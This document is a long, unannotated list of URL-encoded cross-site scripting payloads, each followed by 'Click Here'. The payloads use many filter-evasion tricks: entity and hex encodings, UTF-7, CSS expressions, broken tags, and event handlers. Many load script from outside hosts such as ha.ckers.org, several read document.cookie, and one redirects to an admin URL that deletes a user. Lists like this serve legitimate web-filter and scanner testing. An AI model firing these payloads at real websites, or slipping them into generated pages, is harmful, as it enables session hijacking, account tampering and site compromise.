%26lt%3b%2fC%26gt%3b%26lt%3b%2fX%26gt%3b%26lt%3b%2fxml%26gt%3b%26lt%3bSPAN%20DATASRC%3d%23I%20DATAFLD%3dC%20DATAFORMATAS%3dHTML%26gt%3b%26lt%3b%2fSPAN%26gt%3bClick Here

%26lt%3bSPAN%20DATASRC%3d%5c%22%23xss%5c%22%20DATAFLD%3d%5c%22B%5c%22%20DATAFORMATAS%3d%5c%22HTML%5c%22%26gt%3b%26lt%3b%2fSPAN%26gt%3bClick Here

%26lt%3bXML%20ID%3d%5c%22xss%5c%22%26gt%3b%26lt%3bI%26gt%3b%26lt%3bB%26gt%3b%26lt%3bIMG%20SRC%3d%5c%22javas%26lt%3b!--%20--%26gt%3bcript%26%2358%3balert('XSS')%5c%22%26gt%3b%26lt%3b%2fB%26gt%3b%26lt%3b%2fI%26gt%3b%26lt%3b%2fXML%26gt%3bClick Here

%26lt%3bXML%20SRC%3d%5c%22xsstest%26%2346%3bxml%5c%22%20ID%3dI%26gt%3b%26lt%3b%2fXML%26gt%3bClick Here

%26lt%3bSPAN%20DATASRC%3d%23I%20DATAFLD%3dC%20DATAFORMATAS%3dHTML%26gt%3b%26lt%3b%2fSPAN%26gt%3bClick Here

%26lt%3b%3fimport%20namespace%3d%5c%22t%5c%22%20implementation%3d%5c%22%23default%23time2%5c%22%26gt%3bClick Here

%26lt%3b%3fxml%26%2358%3bnamespace%20prefix%3d%5c%22t%5c%22%20ns%3d%5c%22urn%26%2358%3bschemas-microsoft-com%26%2358%3btime%5c%22%26gt%3bClick Here

%26lt%3bHTML%26gt%3b%26lt%3bBODY%26gt%3bClick Here

%26lt%3bt%26%2358%3bset%20attributeName%3d%5c%22innerHTML%5c%22%20to%3d%5c%22XSS%26lt%3bSCRIPT%20DEFER%26gt%3balert(%26quot%3bXSS%26quot%3b)%26lt%3b%2fSCRIPT%26gt%3b%5c%22%26gt%3bClick Here

%26lt%3b%2fBODY%26gt%3b%26lt%3b%2fHTML%26gt%3bClick Here

%26lt%3bSCRIPT%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjpg%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

echo('IPT%26gt%3balert(%5c%22XSS%5c%22)%26lt%3b%2fSCRIPT%26gt%3b')%3b%20%3f%26gt%3bClick Here

%26lt%3b%3f%20echo('%26lt%3bSCR)'%3bClick Here

%26lt%3bIMG%20SRC%3d%5c%22http%26%2358%3b%2f%2fwww%26%2346%3bthesiteyouareon%26%2346%3bcom%2fsomecommand%26%2346%3bphp%3fsomevariables%3dmaliciouscode%5c%22%26gt%3bClick Here

Redirect%20302%20%2fa%26%2346%3bjpg%20http%26%2358%3b%2f%2fvictimsite%26%2346%3bcom%2fadmin%26%2346%3basp%26deleteuserClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%5c%22Set-Cookie%5c%22%20Content%3d%5c%22USERID%3d%26lt%3bSCRIPT%26gt%3balert('XSS')%26lt%3b%2fSCRIPT%26gt%3b%5c%22%26gt%3bClick Here

%26lt%3bHEAD%26gt%3b%26lt%3bMETA%20HTTP-EQUIV%3d%5c%22CONTENT-TYPE%5c%22%20CONTENT%3d%5c%22text%2fhtml%3b%20charset%3dUTF-7%5c%22%26gt%3b%20%26lt%3b%2fHEAD%26gt%3b%2bADw-SCRIPT%2bAD4-alert('XSS')%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%26lt%3bSCRIPT%20a%3d%5c%22%26gt%3b%5c%22%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20%3d%5c%22%26gt%3b%5c%22%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20a%3d%5c%22%26gt%3b%5c%22%20''%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20%5c%22a%3d'%26gt%3b'%5c%22%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20a%3d%60%26gt%3b%60%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%20a%3d%5c%22%26gt%3b'%26gt%3b%5c%22%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%26gt%3bdocument%26%2346%3bwrite(%5c%22%26lt%3bSCRI%5c%22)%3b%26lt%3b%2fSCRIPT%26gt%3bPT%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2f66%26%2346%3b102%26%2346%3b7%26%2346%3b147%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2f1113982867%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2f%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2f0102%26%2346%3b0146%26%2346%3b0007%26%2346%3b00000223%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22htt%20p%26%2358%3b%2f%2f6%206%26%2346%3b000146%26%2346%3b0x7%26%2346%3b147%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2f0x42%26%2346%3b0x0000066%26%2346%3b0x7%26%2346%3b0x93%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22%2f%2fwww%26%2346%3bgoogle%26%2346%3bcom%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22%2f%2fgoogle%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg@google%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2fgoogle%26%2358%3bha%26%2346%3bckers%26%2346%3borg%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2fwww%26%2346%3bgoogle%26%2346%3bcom%26%2346%3b%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2fwww%26%2346%3bgohttp%26%2358%3b%2f%2fwww%26%2346%3bgoogle%26%2346%3bcom%2fogle%26%2346%3bcom%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22http%26%2358%3b%2f%2fgoogle%26%2346%3bcom%2f%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bA%20HREF%3d%5c%22javascript%26%23058%3bdocument%26%2346%3blocation%3d'http%26%2358%3b%2f%2fwww%26%2346%3bgoogle%26%2346%3bcom%2f'%5c%22%26gt%3bXSS%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bClick Here

%26ltClick Here

%26lt%3bClick Here

%26LTClick Here

%26LT%3bClick Here

%26%2360Click Here

%26%23060Click Here

%26%23000060Click Here

%26%230060Click Here

%26%2300060Click Here

%26%230000060Click Here

%26lt%3bClick Here

%26%23x3cClick Here

%26%23x03cClick Here

%26%23x003cClick Here

%26%23x0003cClick Here

%26%23x00003cClick Here

%26%23x000003cClick Here

%26%23x3c%3bClick Here

%26%23x003c%3bClick Here

%26%23x0003c%3bClick Here

%26%23x03c%3bClick Here

%26%23x00003c%3bClick Here

%26%23x000003c%3bClick Here

%26%23X3cClick Here

%26%23X003cClick Here

%26%23X03cClick Here

%26%23X0003cClick Here

%26%23X00003cClick Here

%26%23X000003cClick Here

%26%23X03c%3bClick Here

%26%23X3c%3bClick Here

%26%23X003c%3bClick Here

%26%23X00003c%3bClick Here

%26%23X0003c%3bClick Here

%26%23X000003c%3bClick Here

%26%23x3CClick Here

%26%23x03CClick Here

%26%23x00003CClick Here

%26%23x003CClick Here

%26%23x0003CClick Here

%26%23x000003CClick Here

%26%23x3C%3bClick Here

%26%23x03C%3bClick Here

%26%23x003C%3bClick Here

%26%23x0003C%3bClick Here

%26%23x00003C%3bClick Here

%26%23x000003C%3bClick Here

%26%23X003CClick Here

%26%23X3CClick Here

%26%23X03CClick Here

%26%23X0003CClick Here

%26%23X000003CClick Here

%26%23X00003CClick Here

%26%23X03C%3bClick Here

%26%23X3C%3bClick Here

%26%23X00003C%3bClick Here

%26%23X003C%3bClick Here

%26%23X0003C%3bClick Here

%26%23X000003C%3bClick Here

%5cu003cClick Here

%5cx3cClick Here

%5cx3CClick Here

%5cu003CClick Here

%26lt%3bIMG%20SRC%3d%5c%22javascript%26%23058%3balert('XSS')%5c%22Click Here

%26lt%3bSCRIPT%20SRC%3d%2f%2fha%26%2346%3bckers%26%2346%3borg%2f%26%2346%3bjs%26gt%3bClick Here

%26lt%3biframe%20src%3dhttp%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fscriptlet%26%2346%3bhtml%26gt%3bClick Here

%26lt%3bSCRIPT%20SRC%3dhttp%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%3f%26lt%3bB%26gt%3bClick Here

%26lt%3b%26lt%3bSCRIPT%26gt%3balert(%5c%22XSS%5c%22)%3b%2f%2f%26lt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%2fSRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bSCRIPT%2fXSS%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%5c%22%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bBODY%20onload!%23$%%26()%2a~%2b-_%26%2346%3b,%26%2358%3b%3b%3f@%26%2391%3b%2f%7c%5c%26%2393%3b%5e%60%3dalert(%5c%22XSS%5c%22)%26gt%3bClick Here

perl%20-e%20'print%20%5c%22%26lt%3bSCR%5c0IPT%26gt%3balert(%5c%5c%22XSS%5c%5c%22)%26lt%3b%2fSCR%5c0IPT%26gt%3b%5c%22%3b'%20%26gt%3b%20outClick Here

%26lt%3bIMG%20SRC%3d%5c%22%20%20%20javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

perl%20-e%20'print%20%5c%22%26lt%3bIMG%20SRC%3djava%5c0script%26%23058%3balert(%5c%5c%22XSS%5c%5c%22)%26gt%3b%5c%22%3b'%20%26gt%3b%20outClick Here

%26lt%3bIMG%20SRC%3d%5c%22jav%26%23x0A%3bascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%5c%22jav%26%23x0D%3bascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%5c%22jav%26%23x09%3bascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%26%23058%3balert('XSS')%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%26%23058%3balert(String%26%2346%3bfromCharCode(88,83,83))%26gt%3bClick Here

%26lt%3bIMG%20%5c%22%5c%22%5c%22%26gt%3b%26lt%3bSCRIPT%26gt%3balert(%5c%22XSS%5c%22)%26lt%3b%2fSCRIPT%26gt%3b%5c%22%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%60javascript%26%23058%3balert(%5c%22RSnake%20says,%20'XSS'%5c%22)%60%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%26%23058%3balert(%26quot%3bXSS%26quot%3b)%26gt%3bClick Here

%26lt%3bIMG%20SRC%3dJaVaScRiPt%26%23058%3balert('XSS')%26gt%3bClick Here

%26lt%3bIMG%20SRC%3djavascript%26%23058%3balert('XSS')%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%5c%22javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bSCRIPT%20SRC%3dhttp%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bjs%26gt%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

''%3b!--%5c%22%26lt%3bXSS%26gt%3b%3d%26%7b()%7dClick Here

''%3b!--%22%3cXSS%3e%3d%26%7b()%7dClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3dJaVaScRiPt%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3djavascrscriptipt%3aalert('XSS')%3eClick Here

%3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3eClick Here

%3cSCRIPT%2fXSS%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%2fSRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22%20%26%2314%3b%20%20javascript%3aalert('XSS')%3b%22%3eClick Here

%3c%3cSCRIPT%3ealert(%22XSS%22)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%3ea%3d%2fXSS%2falert(a%2esource)%3c%2fSCRIPT%3eClick Here

%5c%22%3balert('XSS')%3b%2f%2fClick Here

%3c%2fTITLE%3e%3cSCRIPT%3ealert(%22XSS%22)%3b%3c%2fSCRIPT%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fFRAMESET%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cTABLE%3e%3cTD%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3aalert('XSS'))%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3a%20expression(alert('XSS'))%3b%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%5c0075%5c0072%5c006C%5c0028'%5c006a%5c0061%5c0076%5c0061%5c0073%5c0063%5c0072%5c0069%5c0070%5c0074%5c003a%5c0061%5c006c%5c0065%5c0072%5c0074%5c0028%2e1027%5c0058%2e1053%5c0053%5c0027%5c0029'%5c0029%22%3eClick Here

%3cSTYLE%3e@im%5cport'%5cja%5cvasc%5cript%3aalert(%22XSS%22)'%3b%3c%2fSTYLE%3eClick Here

%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(alert('XSS'))%22%3eClick Here

%3cEMBED%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2eswf%22%20AllowScriptAccess%3d%22always%22%3e%3c%2fEMBED%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(alert('XSS'))%22%3eClick Here

exp%2f%2a%3cA%20STYLE%3d'no%5cxss%3anoxss(%22%2a%2f%2f%2a%22)%3bxss%3a%26%23101%3bx%26%23x2F%3b%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(alert(%22XSS%22))'%3eClick Here

a%3d%22get%22%3bb%3d%22URL(ja%5c%22%22%3bc%3d%22vascr%22%3bd%3d%22ipt%3aale%22%3be%3d%22rt('XSS')%3b%5c%22)%22%3beval(a%2bb%2bc%2bd%2be)%3bClick Here

%3cSCRIPT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejpg%22%3e%3c%2fSCRIPT%3eClick Here

%3cframeset%20onload%3dalert(123)%3eClick Here

%3cSCRIPT%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cform%20id%3d%22test%22%20%2f%3e%3cbutton%20form%3d%22test%22%20formaction%3d%22javascript%3aalert(123)%22%3eTESTHTML5FORMACTIONClick Here

%3cform%3e%3cbutton%20formaction%3d%22javascript%3aalert(123)%22%3ecrosssitesptClick Here

%3cstyle%3e%3cimg%20src%3d%22%3c%2fstyle%3e%3cimg%20src%3dx%20onerror%3dalert(123)%2f%2f%22%3eClick Here

%3c!--%3cimg%20src%3d%22--%3e%3cimg%20src%3dx%20onerror%3dalert(123)%2f%2f%22%3eClick Here

%3cobject%20data%3d%22data%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3d%3d%22%3eClick Here

%3cembed%20src%3d%22data%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3d%3d%22%3eClick Here

%3c%3f%20foo%3d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3c!%20foo%3d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3cembed%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3c%2f%20foo%3d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3cscript%3e(%7b0%3a%230%3dalert%2f%230%23%2f%230%23(123)%7d)%3c%2fscript%3eClick Here

%3cscript%3eObject%2e__noSuchMethod__%20%3d%20Function,[%7b%7d][0]%2econstructor%2e_('alert(1)')()%3c%2fscript%3eClick Here

%3cscript%3eReferenceError%2eprototype%2e__defineGetter__('name',%20function()%7balert(123)%7d),x%3c%2fscript%3eClick Here

%3cscript%3ecrypto%2egenerateCRMFRequest('CN%3d0',0,0,null,'alert(1)',384,null,'rsa-dual-use')%3c%2fscript%3eClick Here

%3csvg%20xmlns%3d%22%23%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%3c%2fsvg%3eClick Here

%3cscript%20src%3d%22%23%22%3e%7balert(1)%7d%3c%2fscript%3e%3b1Click Here

%3ciframe%20xmlns%3d%22%23%22%20src%3d%22javascript%3aalert(1)%22%3e%3c%2fiframe%3eClick Here

%3csvg%20onload%3d%22javascript%3aalert(123)%22%20xmlns%3d%22%23%22%3e%3c%2fsvg%3eClick Here

%2bADw-script%2bAD4-alert(document%2elocation)%2bADw-%2fscript%2bAD4-Click Here

%2BADw-script%2bAD4-alert(document%2elocation)%2BADw-%2fscript%2BAD4-Click Here

%2BACIAPgA8-script%2BAD4-alert%28document%2elocation%29%2BADw-%2Fscript%2BAD4APAAi-Click Here

%253cscript%253ealert(document%2ecookie)%253c%2fscript%253eClick Here

%2bACIAPgA8-script%2bAD4-alert(document%2elocation)%2bADw-%2fscript%2bAD4APAAi-Click Here

%3e%3cScRiPt%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

%3e%3c%3cscript%3ealert(document%2ecookie)%3b%2f%2f%3c%3c%2fscript%3eClick Here

%3e%3cs%2bcript%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

foo%3cscript%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

%3cscr%3cscript%3eipt%3ealert(document%2ecookie)%3c%2fscr%3c%2fscript%3eipt%3eClick Here

%22%2f%3E%3CBODY%20onload%3ddocument%2ewrite(%22%3Cs%22%2b%22cript%20src%3dhttp%3a%2f%2fmy%2ebox%2ecom%2fxss%2ejs%3E%3C%2fscript%3E%22)%3EClick Here

%3b%20alert(document%2ecookie)%3b%20var%20foo%3dClick Here

%3c%2fscript%3e%3cscript%20%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

%3cimg%20src%3dasdf%20onerror%3dalert(document%2ecookie)%3eClick Here

foo%5c%3b%20alert(document%2ecookie)%3b%2f%2f%3bClick Here

%3cscript%3ealert(1)%3c%2fscript%3eClick Here

%3cBODY%20ONLOAD%3dalert(XSS)%3eClick Here

%22%3e%3cscript%3ealert(String%2efromCharCode(66,%20108,%2065,%2099,%2075,%2073,%2099,%20101))%3c%2fscript%3eClick Here

%3cvideo%20src%3d1%20onerror%3dalert(1)%3eClick Here

%3caudio%20src%3d1%20onerror%3dalert(1)%3eClick Here

''%3b!--%22%3cXSS%3e%3d%26%7b()%7dClick Here

%3cscript%2fsrc%3ddata%3a,alert()%3eClick Here

0%5c%22autofocus%2fonfocus%3dalert(1)--%3e%3cvideo%2fposter%2fonerror%3dprompt(2)%3e%22-confirm(3)-%22Click Here

%3cmarquee%2fonstart%3dalert()%3eClick Here

%3cvideo%2fposter%2fonerror%3dalert()%3eClick Here

%3cisindex%2fautofocus%2fonfocus%3dalert()%3eClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3dJaVaScRiPt%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(%22XSS%22)%3eClick Here

%3cIMG%20SRC%3d%60javascript%3aalert(%22RSnake%20says,%20'XSS'%22)%60%3eClick Here

%3ca%20onmouseover%3dalert(document%2ecookie)%3exxs%20link%3c%2fa%3eClick Here

%3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3eClick Here

%3ca%20onmouseover%3d%22alert(document%2ecookie)%22%3exxs%20link%3c%2fa%3eClick Here

%3cIMG%20SRC%3d%23%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3eClick Here

%3cIMG%20SRC%3d%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20SRC%3d%26%23106%3b%26%2397%3b%26%23118%3b%26%2397%3b%26%23115%3b%26%2399%3b%26%23114%3b%26%23105%3b%26%23112%3b%26%23116%3b%26%2358%3b%26%2397%3b%26%23108%3b%26%23101%3b%26%23114%3b%26%23116%3b%26%2340%3bClick Here

%3cIMG%20SRC%3d%2f%20onerror%3d%22alert(String%2efromCharCode(88,83,83))%22%3e%3c%2fimg%3eClick Here

%26%2339%3b%26%2388%3b%26%2383%3b%26%2383%3b%26%2339%3b%26%2341%3b%3eClick Here

%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3eClick Here

%3cIMG%20SRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3eClick Here

%3cIMG%20SRC%3d%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26Click Here

%3cIMG%20SRC%3d%22jav ascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0D%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0A%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x09%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cSCRIPT%2fXSS%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22%20%26%2314%3b%20%20javascript%3aalert('XSS')%3b%22%3eClick Here

%3cBODY%20onload!%23$%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%22XSS%22)%3eClick Here

%3cSCRIPT%2fSRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3c%3cSCRIPT%3ealert(%22XSS%22)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3f%3c%20B%20%3eClick Here

%3cSCRIPT%20SRC%3d%2f%2fha%2eckers%2eorg%2f%2ej%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%22Click Here

%3ciframe%20src%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%3cClick Here

%5c%22%3balert('XSS')%3b%2f%2fClick Here

%3c%2fscript%3e%3cscript%3ealert('XSS')%3b%3c%2fscript%3eClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3c%2fTITLE%3e%3cSCRIPT%3ealert(%22XSS%22)%3b%3c%2fSCRIPT%3eClick Here

%3cIMG%20DYNSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cBODY%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cIMG%20LOWSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cSTYLE%3eli%20%7blist-style-image%3a%20url(%22javascript%3aalert('XSS')%22)%3b%7d%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSS%3c%2fbr%3eClick Here

%3cBODY%20ONLOAD%3dalert('XSS')%3eClick Here

%3cIMG%20SRC%3d%22livescript%3a[code]%22%3eClick Here

%3cIMG%20SRC%3d'vbscript%3amsgbox(%22XSS%22)'%3eClick Here

%3cBGSOUND%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cBR%20SIZE%3d%22%26%7balert('XSS')%7d%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3chttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cSTYLE%3e@import'http%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss'%3b%3c%2fSTYLE%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%22%3eClick Here

%3cSTYLE%3eBODY%7b-moz-binding%3aurl(%22http%3a%2f%2fha%2eckers%2eorg%2fxssmoz%2exml%23xss%22)%7d%3c%2fSTYLE%3eClick Here

%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(alert('XSS'))%22%3eClick Here

%3cSTYLE%3e@im%5cport'%5cja%5cvasc%5cript%3aalert(%22XSS%22)'%3b%3c%2fSTYLE%3eClick Here

exp%2f%2a%3cA%20STYLE%3d'no%5cxss%3anoxss(%22%2a%2f%2f%2a%22)%3bClick Here

xss%3aex%2f%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(alert(%22XSS%22))'%3eClick Here

%3cSTYLE%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3aalert('XSS')%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fA%3eClick Here

%3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3ealert('XSS')%3b%3c%2fSTYLE%3eClick Here

